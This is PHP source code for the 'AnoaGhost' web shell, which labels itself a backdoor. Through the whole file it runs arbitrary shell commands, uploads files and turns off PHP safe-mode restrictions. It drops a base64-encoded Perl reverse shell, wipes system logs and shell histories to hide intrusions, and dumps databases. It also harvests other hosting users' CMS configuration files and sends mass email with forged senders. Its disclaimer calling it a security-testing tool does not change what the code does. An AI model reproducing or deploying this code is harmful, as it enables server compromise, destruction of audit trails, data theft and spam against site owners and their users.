[CA] .0 | CONTROLE UR SERVER ".$_SERVER['HTTP_HOST'].""; ////////// REPORTING @ini_set('output_buffering',0); @ini_set('display_errors', 0); error_reporting(5); @ignore_user_abort(TRUE); @set_magic_quotes_runtime(0); ////////// SET TIME @set_time_limit(0); ///// HTTP_USER_AGENT if(!empty($_SERVER['HTTP_USER_AGENT'])) { $USERAGENTS = array("Twitter","Bing", "Yahoo", "Facebook", "Google", "AnoaGhost","Yandex"); if(preg_match('/AnoaGhost/' . implode('|', $USERAGENTS) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 NOT FOUND'); exit; } } ///// DIR $AnoaGhost = $_POST['AnoaGhost']; $pwd = $_POST['pwd']; $DIR = $_POST['DIR']; if ($DIR == ''){ $DIR = getcwd(); } ///// PHP.INI if ($AnoaGhost == 'ini'){ $fp = fopen("php.ini","w+"); fwrite($fp," safe_mode = Off Safe_mode_gid = Off disable_functions = None disable_classes = None safe_mode_gid = Off open_basedir = Off allow_url_fopen = On "); } //////// PERMISSIONS function getFilePermissions($FILE) { $perms = fileperms($FILE); if (($perms & 0xC000) == 0xC000) { //////// SOCKET $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //////// SYMBOLIC LINK $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //////// REGULAR $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //////// BLOCK SPECIAL $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //////// DIRECTORY $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //////// CHARACTER SPECIAL $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //////// FIFO PIPE $info = 'p'; } else { //////// UNKNOWN $info = "u"; } //////// OWNER $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //////// GROUP $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //////// WORLD $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info;} ///// UP if (!empty ($_FILES['CAUP'])){ MOVE_UPLOADED_FILE($_FILES['CAUP']['tmp_name'],$DIR.'/'.$_FILES['CAUP']['name']); $CA_TEXT = "UPLOADED SUCCESSFULLY
FILE name : ".$_FILES['CAUP']['name']."
FILE SIZE : ".$_FILES['CAUP']['size']."
FILE TYPE : ".$_FILES['CAUP']['type']."
";} ///////// SECOND(S) $TIME = explode(' ', microtime()); $startime = $TIME[1] + $TIME[0]; function debuginfo() { global $startime; $TIME = explode(' ', microtime()); $TOTALTIME = number_format(($TIME[1] + $TIME[0] - $startime), 2); echo ''.$TOTALTIME.' SECOND(S)';} ///// COMMAND function EXAnoaGhost_K() { $in=$_POST['COMMAND']; if (!$in == '') { $CAOUT = ''; if (function_exists('exec')) { @exec($in,$CAOUT); $CAOUT = @join("\n",$CAOUT); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $CAOUT = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $CAOUT = ob_get_clean(); } elseif (function_exists('shell_exec')) { $CAOUT = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $CAOUT = ""; while(!@feof($f)) $CAOUT .= fread($f,1024); pclose($f);} echo $CAOUT;}} function HIDAnoaGhost_K () { //////// HOME echo "[AnoaGhost] | CONTROLE UR WEBSITE ".$_SERVER['HTTP_HOST']." "; echo ""; $META = base64_decode("/"); echo "". $META .""; $META1 = ''; echo ''. $META1 .''; $META2 = ''; echo ''. $META2 .''; $META3 = ''; echo ''. $META3 .''; $META4 = ''; echo ''. $META5 .''; $CHARSET1 = ""; echo ''. $CHARSET1.''; ?> "; $IMGEDITED2 = ''; $BODY = ''; echo ''. $BODY .''; $HEADER = "
"; echo "". $HEADER .""; $NAMES1 = "itu anu itu"; $B1 = ""; echo "". $B1 .""; echo "". $NAMES1 .""; $NAMS2 = "BACKDOR FOR THE NEW GENERATION"; echo ""; echo "". $NAMS2 ."
"; $NAV3 = "";} //// COMMAND function FOTAnoaGhost_K($CA_TEXT,$CA_TEXT1,$DIR) { echo "

✓ COMMAND :
";} ///// END //////////////////////////////// TOOLS NOT FOR KIDS /////////////////////////////////////// function AnoaGhostAnoaGhost_K () { $AnoaGhost_K_AnoaGhost = $_GET['AnoaGhost']; /////// BACK CONNECT PERL if ($_GET['AnoaGhost'] == 'BackConnect') { @error_reporting(0); sleep(2); echo "
"; ?>

BACK-CONNECT PERL

SERVER :

PORT:
' style='width:20%'>

SCRIPT BACK-CONNECT PERL EXTRACTED SUCCESSFULLY.... "; //GENERATE BACK-CONNECT SCRIPT PERL $SCRIPTED = 'dXNlIElPOjpTb2NrZXQ7DQokc3lzdGVtICA9ICcvYmluL2Jhc2gnOw0KJEFSR0M9QEFSR1Y7DQpwcmludCAiQmFjay1Db25uZWN0IFBlcmxcblxuIjsNCmlmICgkQVJHQyE9Mikgew0KICAgcHJpbnQgIlVzYWdlOiAkMCBbSG9zdF0gW1BvcnRdIFxuXG4iOw0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOw0KfQ0KdXNlIFNvY2tldDsNCnVzZSBGaWxlSGFuZGxlOw0Kc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sIGdldHByb3RvYnluYW1lKCd0Y3AnKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIFJlc29sdmUgSG9zdCA6KFxuIjsNCmNvbm5lY3QoU09DS0VULCBzb2NrYWRkcl9pbigkQVJHVlsxXSwgaW5ldF9hdG9uKCRBUkdWWzBdKSkpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBDb25uZWN0IEhvc3QgOihcbiI7DQpwcmludCAiWypdIFJlc29sdmluZyBIb3N0TmFtZVxuIjsNCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLiAkQVJHVlswXSBcbiI7DQpwcmludCAiWypdIFNwYXduaW5nIFNoZWxsIFxuIjsNCnByaW50ICJbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IFwhLyBcbiI7DQpTT0NLRVQtPmF1dG9mbHVzaCgpOw0Kb3BlbihTVERJTiwgIj4mU09DS0VUIik7DQpvcGVuKFNURE9VVCwiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOw0KcHJpbnQgIkJhY2stQ29ubmVjdCBQZXJsXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVDtlY2hvIC0tPT1TeXN0ZW1pbmZvPT0tLTsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLTsgaWQ7ZWNobztlY2hvIC0tPT1EaXJlY3Rvcnk9PS0tOyBwd2Q7ZWNobzsgZWNobyAtLT09U2hlbGw9PS0tICIpOw0Kc3lzdGVtKCRzeXN0ZW0pOw=='; $CHMOD = fopen("backconnected.pl" ,"w+"); $WRITE = fWRITE ($CHMOD ,base64_decode($SCRIPTED)); if($WRITE){ ?>
SCRIPT BACK-CONNECT PERL IS HERE > \backconnected.pl BACK-CONNECT PERL COMMAND > perl backconnected.pl
"; echo "
GO TO COMMAND > USAGE : backconnected.pl [Host] [Port]

"; } //////// MY RIGHT $FOTTER2 = "
"; echo ''. $FOTTER2 .'|' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit; } /////// DELET LOGS if ($_GET['AnoaGhost'] == 'DELLOGS') { error_reporting(E_ERROR | E_PARSE); @ini_set("max_execution_time",0); @set_time_limit(0); echo "

"; echo ""; exec("/logs/access.log"); exec("/logs/error.log"); exec("rm -rf /Apache2.2/logs/access.log"); exec("rm -rf /Apache2.2/logs/error.log"); exec("rm -rf /tmp/logs"); exec("rm -rf /root/.ksh_history"); exec("rm -rf /root/.bash_history"); exec("rm -rf /root/.bash_logout"); exec("rm -rf /usr/local/apache/logs"); exec("rm -rf /usr/local/apache/log"); exec("rm -rf /var/apache/logs"); exec("rm -rf /var/apache/log"); exec("rm -rf /var/run/utmp"); exec("rm -rf /var/logs"); exec("rm -rf /var/log"); exec("rm -rf /var/adm"); exec("rm -rf /etc/wtmp"); exec("rm -rf /etc/utmp"); exec("rm -rf $HISTFILE"); exec("rm -rf /var/log/lastlog"); exec("rm -rf /var/log/wtmp"); //SHELL_EXEC shell_exec("/logs/access.log"); shell_exec("/logs/error.log"); shell_exec("rm -rf /Apache2.2/logs/access.log"); shell_exec("rm -rf /Apache2.2/logs/error.log"); shell_exec("rm -rf /tmp/logs"); shell_exec("rm -rf /root/.ksh_history"); shell_exec("rm -rf /root/.bash_history"); shell_exec("rm -rf /root/.bash_logout"); shell_exec("rm -rf /usr/local/apache/logs"); shell_exec("rm -rf /usr/local/apache/log"); shell_exec("rm -rf /var/apache/logs"); shell_exec("rm -rf /var/apache/log"); shell_exec("rm -rf /var/run/utmp"); shell_exec("rm -rf /var/logs"); shell_exec("rm -rf /var/log"); shell_exec("rm -rf /var/adm"); shell_exec("rm -rf /etc/wtmp"); shell_exec("rm -rf /etc/utmp"); shell_exec("rm -rf $HISTFILE"); shell_exec("rm -rf /var/log/lastlog"); shell_exec("rm -rf /var/log/wtmp"); //PASSTHRU passthru("/logs/access.log"); passthru("/logs/error.log"); passthru("rm -rf /Apache2.2/logs/access.log"); passthru("rm -rf /Apache2.2/logs/error.log"); passthru("rm -rf /tmp/logs"); passthru("rm -rf /root/.ksh_history"); passthru("rm -rf /root/.bash_history"); passthru("rm -rf /root/.bash_logout"); passthru("rm -rf /usr/local/apache/logs"); passthru("rm -rf /usr/local/apache/log"); passthru("rm -rf /var/apache/logs"); passthru("rm -rf /var/apache/log"); passthru("rm -rf /var/run/utmp"); passthru("rm -rf /var/logs"); passthru("rm -rf /var/log"); passthru("rm -rf /var/adm"); passthru("rm -rf /etc/wtmp"); passthru("rm -rf /etc/utmp"); passthru("rm -rf $HISTFILE"); passthru("rm -rf /var/log/lastlog"); passthru("rm -rf /var/log/wtmp"); echo "
"; //LET THE MOTHER OF FUNCTIONS TO COMPLETE THE TASK sleep(1); echo '





GOOD LOCK ! YOUR TRACES HAS BEEN ECRASED FROM THE SERVER
'; echo '

CLEANNER LOGS
'; //////// MY RIGHT $FOTTER2 = "
"; echo ''. $FOTTER2 .'|' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit ; } ///// DETECT LOGS if ($_GET['AnoaGhost'] == 'SQLConnect') { echo "
"; echo "
"; echo ""; class DbClass { var $type; var $link; var $res;function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break;} return false;} function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db)) return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false;} function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $head = true; while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { if($v == null) $item[$k] = "NULL"; elseif(is_numeric($v)) $item[$k] = $v; else $item[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; $head = false; } else $sql = "\n\t,(".implode(", ", $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if(@$_POST['p2']=='download') { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die(''); } echo "
TypeHostLoginPasswordDatabase
"; $tmp = ""; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "'; } else echo $tmp; } else echo $tmp; echo " count the number of rows
"; if(isset($db) && $db->link){ echo "
"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ""; } echo "
Tables:

"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
"; } echo "
File path:
"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch();$pages = ceil($num['n'] / 30); echo "".$_POST['p2']." ({$num['n']} records) Page # "; echo " of $pages"; if($_POST['p3'] > 1) echo " < Prev"; if($_POST['p3'] < $pages) echo " Next >"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "

"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo ''; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ''; foreach($item as $key => $value) echo ''; reset($item); $title=true; echo ''; $line = 2; } echo ''; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo ''; else echo ''; } echo ''; } echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; } else { echo '
Error: '.htmlspecialchars($db->error()).'
'; } } echo "

"; echo "

"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "
Load file
"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '
'.htmlspecialchars($file['file']).'
'; } } else { echo htmlspecialchars($db->error()); } echo '

'; ///// FOOTER $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit; } ///////// EXTRACT if ($_GET["AnoaGhost"] == "EtcExtract"){ ///// FOOTER $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; echo "
"; echo "
"; echo '




'; if(isset($_POST['fpasswd'])){ foreach(explode("\n",$_POST['fpasswd']) as $user){ $user = trim($user); $user = explode(":", $user); echo $user[0]."
"; } } exit; } /////// ABOUT if ($_GET['AnoaGhost'] == 'Abouts') { echo "
"; echo "

"; echo "
itu anu haha

Recoded BY AnoaGhost
YOUTUBER , KILLER HTML5, JAVASCRIPT, CSS , JS , ADOBE PHOTOSHOP
LOGICIEL, MATERIEL INFORMATIQUE ET PROGRAMMATION INFORMATIQUE

MADE IN INDONESIAN
GREETZ TO : UNITED ISLAMIC CYBER FORCE & !nsp3ct0r Team

ABOUT SH3LL [CA]
HACK IS NOT A CRIME , HACK JUSTE FOR TESTING THE SECURITY OF SERVER .
AND TO READ THE ERUR OF THE STUPID PROGRAMMING .
FOR UPDATE AND TO DEVLOP THE WEBSITE
SH3LL AnoaGhost3 IS RESPONSIBLE JUSTE FOR TESTING THE SECURITY OF SERVER
WE ARE THE NEW GENARATION , SH3LL AnoaGhost FOR ME FOR YOU

UPDATE UR VERSION 3.2 , REPPOT ERROR\n
CONTACT




"; ///// FOOTER $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit; } ////// KILLING SHELL if ($_GET['AnoaGhost'] == 'Killing') { $IMGLOGO = '
'; echo "
"; echo ''. $IMGLOGO .'

'; echo '
U REALLY WANT TO REMOVE SHELL ?
'; echo '

YES       NO

'; ///// FOOTER $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit; } /////////// GET DOMAINS if(isset($_GET['AnoaGhost']) && ($_GET['AnoaGhost'] == 'Domains')) { $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; echo "
"; echo ""; echo "
DOMAINS AND USERS
";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("
ERROR : U CAN'T READ [ /ETC/NAMED.CONF ]

");}echo '
DomainsUSERS
';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "".$domains[1][0]."
".$user['name']."";flush();}}} exit;} ///////// CMS SCANNER if ($_GET['AnoaGhost'] == 'Cms') { echo "
"; echo "
"; if(!@is_file('named.txt')){ $d00m = @file("/etc/named.conf"); }else{ $d00m = @file("named.txt"); } if(!$d00m) { die (""); } else { echo "
"; foreach($d00m as $dom){ flush(); flush(); if(eregi("zone",$dom)){ @preg_match_all('#zone "(.*)"#', $dom, $domvw); flush(); if(@strlen(trim($domvw[1][0])) > 2){ $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0])); $wpl=$pageURL."/sim/rut/home/".$user['name']."/public_html/wp-config.php"; $wpp=@get_headers($wpl); $wp=$wpp[0]; $wp2=$pageURL."/sim/rut/home/".$user['name']."/public_html/blog/wp-config.php"; $wpp2=@get_headers($wp2); $wp12=$wpp2[0]; $jo1=$pageURL."/sim/rut/home/".$user['name']."/public_html/configuration.php"; $joo=@get_headers($jo1); $jo=$joo[0]; $jo2=$pageURL."/sim/rut/home/".$user['name']."/public_html/joomla/configuration.php"; $joo2=@get_headers($jo2); $jo12=$joo2[0]; $vb1=$pageURL."/sim/rut/home/".$user['name']."/public_html/includes/config.php"; $vbb=@get_headers($vb1); $vb=$vbb[0]; $vb2=$pageURL."/sim/rut/home/".$user['name']."/public_html/vb/includes/config.php"; $vbb2=@get_headers($vb2); $vb12=$vbb2[0]; $vb3=$pageURL."/sim/rut/home/".$user['name']."/public_html/forum/includes/config.php"; $vbb3=@get_headers($vb3); $vb13=$vbb3[0]; $wh1=$pageURL."/sim/rut/home/".$user['name']."public_html/clients/configuration.php"; $whh2= @get_headers($wh1); $wh=$whh2[0]; $wh2=$pageURL."/sim/rut/home/".$user['name']."/public_html/support/configuration.php"; $whh2= @get_headers($wh2); $wh12=$whh2[0]; $wh3=$pageURL."/sim/rut/home/".$user['name']."/public_html/database.php"; $whh3= @get_headers($wh3); $wh13=$whh3[0]; $wh5=$pageURL."/sim/rut/home/".$user['name']."/public_html/config.php"; $whh5= @get_headers($wh5); $wh15=$whh5[0]; $wspan=$pageURL."/sim/rut/home/".$user['name']."/public_html/client/configuration.php"; $whspan= @get_headers($wspan); $wh14=$whspan[0]; $pos = strpos($wp, "200"); $config=" "; if (strpos($wp, "200") == true ) { $config=""; } elseif (strpos($wp12, "200") == true) { $config=""; } elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true ) { $config=" "; } elseif (strpos($wh12, "200") == true) { $config =""; } elseif (strpos($wh13, "200") == true) { $config =""; } elseif (strpos($jo, "200") == true) { $config=" "; } elseif (strpos($jo12, "200") == true) { $config=" "; } elseif (strpos($vb, "200") == true) { $config=" "; } elseif (strpos($vb12, "200") == true) { $config=" "; } elseif (strpos($vb13, "200") == true) { $config=" "; } else { continue; } flush(); flush(); $site = $user['name'] ; flush(); echo ""; flush(); } } } } echo "
Domains Script
".$domvw[1][0]." ".$config."


"; $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit ; } ////////// MAILS if ($_GET['AnoaGhost'] == 'Mails') { echo "
"; echo "
"; echo "
"; echo "

LISTE EMAILS :


"; $emails = $_POST['emails']; $ex = explode("\n",$emails); $count = count($ex); if(isset($emails)&&$count>=1){ echo "
$count Number of emails :

"; }else{ exit;} if(isset($emails)){ for($i=0;$i<=$count;$i++){ $d = strtolower($ex[$i]); if(strstr($d,"hotmail") || strstr($d,"live") || strstr($d,"msn") || strstr($d,"outlook")){ $hotmail.=$d; $nh = $nh + 1; }else{ if(strstr($d,"yahoo") || strstr($d,"ymail")){ $yahoo.=$d; $ny = $ny + 1; }else{ if(strstr($d,"gmail") || strstr($d,"googlemail") ){ $gmail.=$d; $ng = $ng + 1; }else{ if(strstr($d,"aol") ){ $aol.=$d; $na = $na + 1; }else{ if(strstr($d,"yahoo") ){ $mailru .=$d; $nr = $nr + 1; }else{ if(strstr($d,"wanadoo") ){ $wanadoo .=$d; $nw = $nw + 1; }else{ if(strstr($d,"ntlworld") ){ $ntlworld .=$d; $nt = $nt + 1; }else{ if(strstr($d,"gmx") ){ $gmx .=$d; $ngm = $ngm + 1; }else{ if(strstr($d,"@web.") ){ $web .=$d; $nw2 = $nw2 + 1; }else{ $ather .=$d; $nn=$nn + 1; } } } } } } } } } } } ?>
hotmail ( )
gmail ( )
aol ( )
yahoo ( )
mail.ru( )
wanadoo( )
ntlworld( )
gmx( )
web( )
ather mails( )
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .''; echo ''. $THEEND .'' ; exit;} ////// MAILER V1.0 if ($_GET['AnoaGhost'] == 'mailers') { echo "
"; echo "
"; if(empty($_POST)==false){ $emails = preg_split("/\r\n|\n|\r/",$_POST["UnSend"]); foreach($emails as $email){ $headers = array(); $headers[] = "MIME-Version: 1.0"; $headers[] = "Content-type: text/plain; charset=iso-8859-1"; $headers[] = "From: " . $_POST["sendername"] . " <" . $_POST["senderemail"] . ">"; $headers[] = "Bcc: " . $_POST["Targetname"] . " <" . $_POST["Targetemail"] . ">"; $headers[] = "Reply-To: <" . $_POST["repto"] . ">"; $headers[] = "Subject: " . $_POST["title"]; if($_POST["epriority"]==1){ $headers[] = "X-Priority: 1 (Highest)"; $headers[] = "X-MSMail-Priority: High"; $headers[] = "Importance: High"; }elseif($_POST["epriority"]==3){ $headers[] = "X-Priority: 5 (Lowest)"; $headers[] = "X-MSMail-Priority: Low"; $headers[] = "Importance: Low"; } $headers[] = "X-Mailer: PHP/".phpversion(); mail($email, $_POST["title"], $_POST["Texta"], implode("\r\n", $headers)); } print "DONE! "; }else{ ?>

Emails :

Your Email :

Your Name :

Reply-To :

Subject :

Email Priority :



Your Text :






"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .''; echo ''. $THEEND .'' ; exit; } /////////// BRUTE MAILERS if ($_GET['AnoaGhost'] == 'Brutmailers') { echo "
"; echo "

"; $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'
